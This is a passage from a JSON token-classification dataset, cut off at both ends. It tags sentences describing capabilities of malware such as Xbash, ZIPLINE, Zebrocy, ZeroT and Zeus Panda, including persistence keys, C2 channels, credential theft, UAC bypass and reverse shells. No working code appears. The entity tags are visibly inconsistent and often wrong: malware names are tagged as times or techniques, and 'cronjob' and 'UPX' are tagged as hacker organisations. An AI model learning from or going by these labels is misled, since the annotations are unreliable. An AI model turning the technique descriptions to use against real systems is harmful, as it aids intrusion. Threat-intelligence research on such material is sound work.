"main.applescript</code>." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XTunnel", "uses", "SSL/TLS", "and", "RC4", "to", "encrypt", "traffic." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "A", "version", "of", "XTunnel", "introduced", "in", "July", "2015", "inserted", "junk", "code", "into", "the", "binary", "in", "a", "likely", "attempt", "to", "obfuscate", "it", "and", "bypass", "security", "products." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "I-Time", "I-Time", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XTunnel", "is", "capable", "of", "accessing", "locally", "stored", "passwords", "on", "victims." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "C2", "server", "used", "by", "XTunnel", "provides", "a", "port", "number", "to", "the", "victim", "to", "use", "as", "a", "fallback", "in", "case", "the", "connection", "closes", "on", "the", "currently", "used", "port." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XTunnel", "is", "capable", "of", "probing", "the", "network", "for", "open", "ports." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "A", "version", "of", "XTunnel", "introduced", "in", "July", "2015", "obfuscated", "the", "binary", "using", "opaque", "predicates", "and", "other", "techniques", "in", "a", "likely", "attempt", "to", "obfuscate", "it", "and", "bypass", "security", "products." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "I-Time", "I-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XTunnel", "relays", "traffic", "between", "a", "C2", "server", "and", "a", "victim." ], "ner_tags": [ "B-Way", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "XTunnel", "has", "been", "used", "to", "execute", "remote", "commands." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Xbash", "can", "create", "a", "cronjob", "for", "persistence", "if", "it", "determines", "it", "is", "on", "a", "Linux", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Xbash", "has", "destroyed", "Linux-based", "databases", "as", "part", "of", "its", "ransomware", "capabilities." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Xbash", "has", "maliciously", "encrypted", "victim's", "database", "systems", "and", "demanded", "a", "cryptocurrency", "ransom", "be", "paid." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Xbash", "can", "obtain", "a", "webpage", "hosted", "on", "Pastebin", "to", "update", "its", "C2", "domain", "list." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Xbash", "can", "attempt", "to", "exploit", "known", "vulnerabilities", "in", "Hadoop,", "Redis,", "or", "ActiveMQ", "when", "it", "finds", "those", "services", "running", "in", "order", "to", "conduct", "further", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Xbash", "can", "download", "additional", "malicious", "files", "from", "its", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Xbash", "can", "execute", "malicious", "JavaScript", "payloads", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Xbash", "can", "use", "mshta", "for", "executing", "scripts." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Xbash", "can", "perform", "port", "scanning", "of", "TCP", "and", "UDP", "ports." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Xbash", "can", "obtain", "a", "list", "of", "weak", "passwords", "from", "the", "C2", "server", "to", "use", "for", "brute", "forcing", "as", "well", "as", "attempt", "to", "brute", "force", "services", "with", "open", "ports." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Xbash", "can", "use", "scripts", "to", "invoke", "PowerShell", "to", "download", "a", "malicious", "PE", "executable", "or", "PE", "DLL", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Xbash", "can", "create", "a", "Startup", "item", "for", "persistence", "if", "it", "determines", "it", "is", "on", "a", "Windows", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Xbash", "can", "use", "regsvr32", "for", "executing", "scripts." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "I-Features", "O" ] }, { "tokens": [ "Xbash", "can", "collect", "IP", "addresses", "and", "local", "intranet", "information", "from", "a", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Xbash", "can", "execute", "malicious", "VBScript", "payloads", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Xbash", "uses", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "YAHOYAH", "decrypts", "downloaded", "files", "before", "execution." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "YAHOYAH", "encrypts", "its", "configuration", "file", "using", "a", "simple", "algorithm." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "YAHOYAH", "uses", "HTTP", "GET", "requests", "to", "download", "other", "files", "that", "are", "executed", "in", "memory." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "YAHOYAH", "checks", "for", "antimalware", "solution", "processes", "on", "the", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "YAHOYAH", "checks", "for", "the", "system’s", "Windows", "OS", "version", "and", "hostname." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "YAHOYAH", "uses", "HTTP", "for", "C2." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "ZIPLINE", "can", "add", "itself", "to", "the", "exclusion", "list", "for", "the", "Ivanti", "Connect", "Secure", "Integrity", "Checker", "Tool", "if", "the", "`--exclude`", "parameter", "is", "passed", "by", "the", "`tar`", "process." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIPLINE", "can", "find", "and", "append", "specific", "files", "on", "Ivanti", "Connect", "Secure", "VPNs", "based", "upon", "received", "commands." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIPLINE", "can", "download", "files", "to", "be", "saved", "on", "the", "compromised", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIPLINE", "can", "communicate", "with", "C2", "using", "a", "custom", "binary", "protocol." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "ZIPLINE", "can", "identify", "running", "processes", "and", "their", "names." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIPLINE", "can", "create", "a", "proxy", "server", "on", "compromised", "hosts." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O" ] }, { "tokens": [ "ZIPLINE", "can", "use", "AES-128-CBC", "to", "encrypt", "data", "for", "both", "upload", "and", "download." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "ZIPLINE", "can", "identify", "a", "specific", "string", "in", "intercepted", "network", "traffic,", "`SSH-2.0-OpenSSH_0.3xx.`,", "to", "trigger", "its", "command", "functionality." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIPLINE", "can", "use", "`/bin/sh`", "to", "create", "a", "reverse", "shell", "and", "execute", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "ZLib", "backdoor", "compresses", "communications", "using", "the", "standard", "Zlib", "compression", "library." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "B-Idus", "O", "O", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "ZLib", "has", "sent", "data", "and", "files", "from", "a", "compromised", "host", "to", "its", "C2", "servers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZLib", "has", "the", "ability", "to", "enumerate", "files", "and", "drives." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "ZLib", "has", "the", "ability", "to", "download", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "ZLib", "mimics", "the", "resource", "version", "information", "of", "legitimate", "Realtek", "Semiconductor,", "Nvidia,", "or", "Synaptics", "modules." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "ZLib", "has", "the", "ability", "to", "obtain", "screenshots", "of", "the", "compromised", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "ZLib", "has", "the", "ability", "to", "enumerate", "system", "information." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "ZLib", "has", "the", "ability", "to", "discover", "and", "manipulate", "Windows", "services." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "ZLib", "communicates", "over", "HTTP", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "ZLib", "has", "the", "ability", "to", "execute", "shell", "commands." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "ZLib", "creates", "Registry", "keys", "to", "allow", "itself", "to", "run", "as", "various", "services." ], "ner_tags": [ "B-Way", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "has", "used", "a", "method", "similar", "to", "RC4", "as", "well", "as", "AES", "for", "encryption", "and", "hexadecimal", "for", "encoding", "data", "before", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "uses", "SSL", "and", "AES", "ECB", "for", "encrypting", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "scans", "the", "system", "and", "automatically", "collects", "files", "with", "the", "following", "extensions:", ".doc,", ".docx,", ",.xls,", ".xlsx,", ".pdf,", ".pptx,", ".rar,", ".zip,", ".jpg,", ".jpeg,", ".bmp,", ".tiff,", ".kum,", ".tlg,", ".sbx,", ".cr,", ".hse,", ".hsf,", "and", ".lhz." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Zebrocy", "installs", "an", "application-defined", "Windows", "hook", "to", "get", "notified", "when", "a", "network", "drive", "has", "been", "attached,", "so", "it", "can", "then", "use", "the", "hook", "to", "call", "its", "RecordToFile", "file", "stealing", "method." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "has", "the", "capability", "to", "upload", "dumper", "tools", "that", "extract", "credentials", "from", "web", "browsers", "and", "store", "them", "in", "database", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "decodes", "its", "secondary", "payload", "and", "writes", "it", "to", "the", "victim’s", "machine.", "Zebrocy", "also", "uses", "AES", "and", "XOR", "to", "decrypt", "strings", "and", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "has", "exfiltrated", "data", "to", "the", "designated", "C2", "server", "using", "HTTP", "POST", "requests." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "has", "a", "command", "to", "delete", "files", "and", "directories." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Zebrocy", "searches", "for", "files", "that", "are", "60mb", "and", "less", "and", "contain", "the", "following", "extensions:", ".doc,", ".docx,", ".xls,", ".xlsx,", ".ppt,", ".pptx,", ".exe,", ".zip,", "and", ".rar.", "Zebrocy", "also", "runs", "the", "<code>echo", "%APPDATA%</code>", "command", "to", "list", "the", "contents", "of", "the", "directory.", "Zebrocy", "can", "obtain", "the", "current", "execution", "path", "as", "well", "as", "perform", "drive", "enumeration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "obtains", "additional", "code", "to", "execute", "on", "the", "victim's", "machine,", "including", "the", "downloading", "of", "a", "secondary", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "stores", "all", "collected", "information", "in", "a", "single", "file", "before", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "performs", "persistence", "with", "a", "logon", "script", "via", "adding", "to", "the", "Registry", "key", "<code>HKCU\\Environment\\UserInitMprLogonScript</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "uses", "SMTP", "and", "POP3", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Zebrocy", "identifies", "network", "drives", "when", "they", "are", "added", "to", "victim", "systems." ], "ner_tags": [ "B-Time", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "enumerates", "information", "about", "connected", "storage", "devices." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "uses", "the", "<code>tasklist</code>", "and", "<code>wmic", "process", "get", "Capture,", "ExecutablePath</code>", "commands", "to", "gather", "the", "processes", "running", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "executes", "the", "<code>reg", "query</code>", "command", "to", "obtain", "information", "in", "the", "Registry." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "creates", "an", "entry", "in", "a", "Registry", "Run", "key", "for", "the", "malware", "to", "execute", "on", "startup." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "has", "a", "command", "to", "create", "a", "scheduled", "task", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "variant", "of", "Zebrocy", "captures", "screenshots", "of", "the", "victim’s", "machine", "in", "JPEG", "and", "BMP", "format." ], "ner_tags": [ "O", "O", "O", "B-Idus", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy's", "Delphi", "variant", "was", "packed", "with", "UPX." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Zebrocy", "has", "used", "URL/Percent", "Encoding", "on", "data", "exfiltrated", "via", "HTTP", "POST", "requests." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "collects", "the", "OS", "version,", "computer", "name", "and", "serial", "number", "for", "the", "storage", "volume", "C:\\.", "Zebrocy", "also", "runs", "the", "<code>systeminfo</code>", "command", "to", "gather", "system", "information." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Zebrocy", "runs", "the", "<code>ipconfig", "/all</code>", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "uses", "<code>netstat", "-aon</code>", "to", "gather", "network", "connection", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "gets", "the", "username", "from", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "gathers", "the", "current", "time", "zone", "and", "date", "information", "from", "the", "system." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zebrocy", "uses", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Zebrocy", "uses", "cmd.exe", "to", "execute", "commands", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "One", "variant", "of", "Zebrocy", "uses", "WMI", "queries", "to", "gather", "information." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "ZeroT", "has", "obfuscated", "DLLs", "and", "functions", "using", "dummy", "API", "calls", "inserted", "between", "real", "instructions." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Many", "ZeroT", "samples", "can", "perform", "UAC", "bypass", "by", "using", "eventvwr.exe", "to", "execute", "a", "malicious", "file." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZeroT", "has", "used", "DLL", "side-loading", "to", "load", "malicious", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZeroT", "shellcode", "decrypts", "and", "decompresses", "its", "RC4-encrypted", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZeroT", "has", "encrypted", "its", "payload", "with", "RC4." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZeroT", "can", "download", "additional", "payloads", "onto", "the", "victim." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Some", "ZeroT", "DLL", "files", "have", "been", "packed", "with", "UPX." ], "ner_tags": [ "O", "B-SamFile", "B-SecTeam", "B-SamFile", "O", "O", "O", "O", "B-HackOrg" ] }, { "tokens": [ "ZeroT", "has", "retrieved", "stage", "2", "payloads", "as", "Bitmap", "images", "that", "use", "Least", "Significant", "Bit", "(LSB)", "steganography." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "ZeroT", "has", "used", "RC4", "to", "encrypt", "C2", "traffic." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZeroT", "gathers", "the", "victim's", "computer", "name,", "Windows", "version,", "and", "system", "language,", "and", "then", "sends", "it", "to", "its", "C2", "server." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZeroT", "gathers", "the", "victim's", "IP", "address", "and", "domain", "information,", "and", "then", "sends", "it", "to", "its", "C2", "server." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZeroT", "has", "used", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "ZeroT", "can", "add", "a", "new", "service", "to", "ensure", "PlugX", "persists", "on", "the", "system", "when", "delivered", "as", "another", "payload", "onto", "the", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "variants", "of", "the", "Zeroaccess", "Trojan", "have", "been", "known", "to", "store", "data", "in", "Extended", "Attributes." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Zeroaccess", "is", "a", "kernel-mode", "rootkit." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Zeus", "Panda", "can", "hook", "GetClipboardData", "function", "to", "watch", "for", "clipboard", "pastes", "to", "collect." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zeus", "Panda", "obfuscates", "the", "macro", "commands", "in", "its", "initial", "payload." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zeus", "Panda", "can", "launch", "remote", "scripts", "on", "the", "victim’s", "machine." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zeus", "Panda", "hooks", "processes", "by", "leveraging", "its", "own", "IAT", "hooked", "functions." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O" ] }, { "tokens": [ "Zeus", "Panda", "decrypts", "strings", "in", "the", "code", "during", "the", "execution", "process." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zeus", "Panda", "encrypts", "strings", "with", "XOR.", "Zeus", "Panda", "also", "encrypts", "all", "configuration", "and", "settings", "in", "AES", "and", "RC4." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zeus", "Panda", "has", "a", "command", "to", "delete", "a", "file.", "It", "also", "can", "uninstall", "scripts", "and", "delete", "files", "to", "cover", "its", "track." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zeus", "Panda", "searches", "for", "specific", "directories", "on", "the", "victim’s", "machine." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zeus", "Panda", "can", "download", "additional", "malware", "plug-in", "modules", "and", "execute", "them", "on", "the", "victim’s", "machine." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zeus", "Panda", "can", "perform", "keylogging", "on", "the", "victim’s", "machine", "by", "hooking", "the", "functions", "TranslateMessage", "and", "WM_KEYDOWN." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Zeus", "Panda", "modifies", "several", "Registry", "keys", "under", "<code>HKCU\\Software\\Microsoft\\Internet", "Explorer\\", "PhishingFilter\\</code>", "to", "disable", "phishing", "filters." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Zeus", "Panda", "checks", "processes", "on", "the", "system", "and", "if", "they", "meet", "the", "necessary", "requirements,", "it", "injects", "into", "that", "process." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zeus", "Panda", "uses", "PowerShell", "to", "download", "and", "execute", "the", "payload." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zeus", "Panda", "checks", "for", "running", "processes", "on", "the", "victim’s", "machine." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zeus", "Panda", "checks", "for", "the", "existence", "of", "a", "Registry", "key", "and", "if", "it", "contains", "certain", "values." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zeus", "Panda", "adds", "persistence", "by", "creating", "Registry", "Run", "keys." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zeus", "Panda", "can", "take", "screenshots", "of", "the", "victim’s", "machine." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zeus", "Panda", "checks", "to", "see", "if", "anti-virus,", "anti-spyware,", "or", "firewall", "products", "are", "installed", "in", "the", "victim’s", "environment." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zeus", "Panda", "collects", "the", "OS", "version,", "system", "architecture,", "computer", "name,", "product", "ID,", "install", "date,", "and", "information", "on", "the", "keyboard", "mapping", "to", "determine", "the", "language", "used", "on", "the", "system." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", 